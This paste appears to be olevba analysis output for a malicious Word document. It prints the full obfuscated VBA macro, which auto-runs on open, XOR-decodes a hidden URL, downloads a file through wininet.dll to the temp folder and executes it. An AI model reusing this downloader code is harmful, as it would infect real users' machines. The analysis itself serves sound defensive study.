Advertisement
dynamoo

Malicious Word macro

Apr 7th, 2015
445
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MASIHB- 04.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 04.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 04.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub InIn()
  17. CALTHA
  18. End Sub
  19.  
  20. Sub autoopen()
  21. InIn
  22. End Sub
  23.  
  24. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  25. ANALYSIS:
  26. +----------+----------+---------------------------------------+
  27. | Type     | Keyword  | Description                           |
  28. +----------+----------+---------------------------------------+
  29. | AutoExec | AutoOpen | Runs when the Word document is opened |
  30. +----------+----------+---------------------------------------+
  31. -------------------------------------------------------------------------------
  32. VBA MACRO FILE6.bas
  33. in file: 04.doc - OLE stream: u'Macros/VBA/FILE6'
  34. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  35.  
  36. Option Explicit
  37. Public Const BRITTANIA = "BRITTANY"
  38.  
  39.  
  40.  
  41. Private Const BRANDI = 8162
  42. Private Const BRANDY As String = "HAZ"
  43. Private Const BREANA = 1
  44. Private Const BREDA = &H4000000
  45.  
  46. Public Function BRENDA _
  47. (ByVal BREE As String) As Boolean
  48.     #If VBA7 _
  49.     And Win64 Then
  50.         Dim BRETT As LongPtr, BRIANNA As LongPtr
  51.     #Else
  52.         Dim BRETT As Long, BRIANNA As Long
  53.     #End If
  54.     Dim BRIAR As Long
  55.     Dim BRIDGET As String * BRANDI, BRIELLE As String
  56.     Dim BRIER As Integer, BRIONY As Double
  57.     BRETT = CAMEO(BRANDY, BREANA, vbNullString, vbNullString, 0)
  58.     If BRETT = 0 Then
  59.         Exit Function
  60.     End If
  61.     Dim FiGaMan As Boolean
  62.    
  63.     If BRITANNIA(BRIANNA, BRETT) Then
  64.     End If
  65.     If BRIANNA = 0 Then
  66.         BRIONY = 0
  67.     Else
  68.         BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
  69.         BRIELLE = BRIDGET
  70.         Do While BRIAR <> 0
  71.             BRITNEY BRIANNA, BRIDGET, BRANDI, BRIAR
  72.            
  73.             Dim BRITT As Long
  74. For BRITT = 6 To 8
  75. If BRITT = 38 Then End
  76. Next BRITT
  77.            
  78.             BRIELLE = BRIELLE + Mid(BRIDGET, 1, BRIAR)
  79.         Loop
  80.             BRIONY = Len(BRIELLE): BRIER = FreeFile
  81.         Open BREE _
  82.             For Binary Access Write _
  83.         Lock Write _
  84.         As #BRIER
  85.         Put #BRIER, _
  86.                 , BRIELLE
  87.         Dim BRITTA As Double
  88.             For BRITTA = 2 To 3
  89.     If BRITTA = 37 Then End
  90. Next BRITTA
  91.         Close #BRIER
  92.     End If
  93.     BRITTANI BRIANNA
  94.     BRITTANI BRETT
  95.     BRIELLE = ""
  96.     If BRIONY Then
  97.         BRENDA = True
  98.     End If
  99. End Function
  100.  
  101. Public _
  102. Function BRITTNEY(BRITTNY _
  103. As _
  104. String)
  105. BROGAN
  106. End Function
  107. Public Function BROGAN()
  108.  
  109. Dim BRONTE  As Object
  110. Set BRONTE = CreateObject _
  111. (BROOK(BROOKE, BROOKLYN))
  112.  
  113. Dim BRYANNA As Object
  114. Set BRYANNA = BRYONY(BRONTE)
  115.  
  116. Dim BUFFY
  117. Dim BUNNY
  118. BUNNY = BROOK(BROOKE, BUNTY)
  119. BUFFY = BRYANNA & BUNNY
  120. Dim BURGUNDY As Integer
  121. For BURGUNDY = 6 To 7
  122. If BURGUNDY = 33 Then End
  123. Next BURGUNDY
  124. Dim CADENCE As Integer
  125. For CADENCE = 2 To 3
  126. If CADENCE = 34 Then End
  127. Next CADENCE
  128.  
  129. If CADY(BRONTE, BUFFY) Then
  130. BRONTE. _
  131. DeleteFile BUFFY
  132. End If
  133. If BRENDA(BUFFY) Then
  134. End If
  135. If CADY(BRONTE, BUFFY) Then
  136. End If
  137. Dim CAELIE
  138. Set CAELIE = CreateObject _
  139. (BROOK _
  140. (BROOKE, CAETLIN))
  141. CAELIE.Open BUFFY
  142. End Function
  143.  
  144.  
  145. Public Function CANDICE(CANDIDA As String) As Integer
  146. CANDICE = Len(CANDIDA)
  147. End Function
  148.  
  149. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  150. ANALYSIS:
  151. +------------+----------------+-----------------------------------------+
  152. | Type       | Keyword        | Description                             |
  153. +------------+----------------+-----------------------------------------+
  154. | Suspicious | CreateObject   | May create an OLE object                |
  155. | Suspicious | Open           | May open a file                         |
  156. | Suspicious | Write          | May write to a file (if combined with   |
  157. |            |                | Open)                                   |
  158. | Suspicious | Put            | May write to a file (if combined with   |
  159. |            |                | Open)                                   |
  160. | Suspicious | Binary         | May read or write a binary file (if     |
  161. |            |                | combined with Open)                     |
  162. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  163. |            |                | may be used to obfuscate strings        |
  164. |            |                | (option --decode to see all)            |
  165. +------------+----------------+-----------------------------------------+
  166. -------------------------------------------------------------------------------
  167. VBA MACRO PIDLE0.bas
  168. in file: 04.doc - OLE stream: u'Macros/VBA/PIDLE0'
  169. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  170.  
  171.  
  172.  
  173. Sub CALTHA()
  174.         Dim CAMELLIA As Long
  175.  
  176.     Dim CANDIS As Double
  177. For CANDIS = 44 To 46
  178. If CANDIS = 32 Then End
  179. Next CANDIS
  180. CAMELLIA = 89
  181. CALANTHA (CAMELLIA)
  182.  
  183. End Sub
  184.  
  185.  
  186. Public Function BROOK(CAMERON As String, CAMILLA As String) As String
  187.    
  188.     Dim CAMILLE As Integer
  189.     Dim CAMMIE As Integer
  190.    
  191.    
  192.     Dim CAMRYN As Double
  193. For CAMRYN = 1 To 3
  194. If CAMRYN = 32 Then End
  195. Next CAMRYN
  196.    
  197.     Dim CANDACE As Long
  198.     Dim CANDI As String
  199.     For CANDACE = 1 _
  200.     To _
  201.     ( _
  202.     CANDICE _
  203.     (CAMILLA) _
  204.     / 2)
  205.         CAMILLE = Val("&H" & _
  206.         (Mid$(CAMILLA, _
  207.         (2 * CANDACE) - 1, 2)))
  208.         CAMMIE = Asc(Mid$(CAMERON, _
  209.         ((CANDACE Mod Len(CAMERON)) + 1), 1))
  210.         CANDI = CANDI + Chr(CAMILLE Xor CAMMIE)
  211.     Next CANDACE
  212.    BROOK = CANDI
  213. End Function
  214.  
  215.  
  216. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  217. ANALYSIS:
  218. +------------+---------+-----------------------------------------+
  219. | Type       | Keyword | Description                             |
  220. +------------+---------+-----------------------------------------+
  221. | Suspicious | Chr     | May attempt to obfuscate specific       |
  222. |            |         | strings                                 |
  223. | Suspicious | Xor     | May attempt to obfuscate specific       |
  224. |            |         | strings                                 |
  225. +------------+---------+-----------------------------------------+
  226. -------------------------------------------------------------------------------
  227. VBA MACRO IDL4.bas
  228. in file: 04.doc - OLE stream: u'Macros/VBA/IDL4'
  229. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  230.  
  231.  
  232. Public Const CAETLIN = "635A5C555F1E7049425C5A5159405C595C"
  233. Public Const BUNTY = "6C40565B4643450B1C01521C5D4C50"
  234. Public Const CAITLYN = "58464D49091F1E5B5747525957591B5257170301021F050C1C524D57"
  235. Public Const BROOKLYN = "63514B5043445857551E755B5451664F414C545E7D5259515143"
  236. Public Const BROOKE = "1029930192032845628132034275236"
  237.  
  238.  
  239.  
  240.  
  241. #If VBA7 And Win64 Then
  242. Public Declare PtrSafe Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As LongPtr) As Long
  243. Public Declare PtrSafe Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As LongPtr
  244. Public Declare PtrSafe Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As LongPtr, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  245. Public Declare PtrSafe Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As LongPtr, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As LongPtr
  246. #Else
  247. Public Declare Function BRITTANI Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef hInet As Long) As Long
  248. Public Declare Function CAMEO Lib "wininet.dll" Alias "InternetOpenA" (ByVal sAgent As String, ByVal lAccessType As Long, ByVal sProxyName As String, ByVal sProxyBypass As String, ByVal lFlags As Long) As Long
  249. Public Declare Function BRITNEY Lib "wininet.dll" Alias "InternetReadFile" (ByVal BREDA3333 As Long, ByVal BRIDGET As String, ByVal lNumBytesToRead As Long, lNumberOfBytesRead As Long) As Integer
  250. Public Declare Function CALLIE Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal hInternetSession As Long, ByVal lpszUrl As String, ByVal lpszHeaders As String, ByVal dwHeadersLength As Long, ByVal dwFlags As Long, ByVal dwContext As Long) As Long
  251. #End If
  252.  
  253.  
  254. Public Function BRYONY(ByRef CALANTHE As Object) As Object
  255. Set BRYONY = CALANTHE.GetSpecialFolder(2)
  256. End Function
  257. Sub CALANTHA(CALEIGH As Long)
  258.  
  259. BRITTNEY ("CALANTHIA")
  260. End Sub
  261.  
  262.  
  263.  
  264. Public Function CADY(ByRef CAILEIGH As Object, ByVal CAILYN As String) As Boolean
  265. If CAILEIGH.FileExists(CAILYN) Then
  266. CADY = True
  267. Else
  268. CADY = False
  269. End If
  270. End Function
  271. #If VBA7 _
  272.     And Win64 Then
  273.        Public Function BRITANNIA(ByRef CALIDA As LongPtr, CALLA As LongPtr) As Boolean
  274.     #Else
  275.        Public Function BRITANNIA(ByRef CALIDA As Long, CALLA As Long) As Boolean
  276.     #End If
  277. Dim CALLIDORA As String
  278.     CALLIDORA = BROOK(BROOKE, CAITLYN)
  279.    
  280.                 CALIDA _
  281.     = CALLIE _
  282.     ( _
  283.     CALLA, _
  284.     CALLIDORA, vbNullString, _
  285.     0, _
  286.     BREDA, 0)
  287.     BRITANNIA = True
  288. End Function
  289.  
  290.  
  291. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  292. ANALYSIS:
  293. +------------+----------------+-----------------------------------------+
  294. | Type       | Keyword        | Description                             |
  295. +------------+----------------+-----------------------------------------+
  296. | Suspicious | Lib            | May run code from a DLL                 |
  297. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
  298. |            |                | be used to obfuscate strings (option    |
  299. |            |                | --decode to see all)                    |
  300. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  301. |            |                | may be used to obfuscate strings        |
  302. |            |                | (option --decode to see all)            |
  303. | IOC        | wininet.dll    | Executable file name                    |
  304. +------------+----------------+-----------------------------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement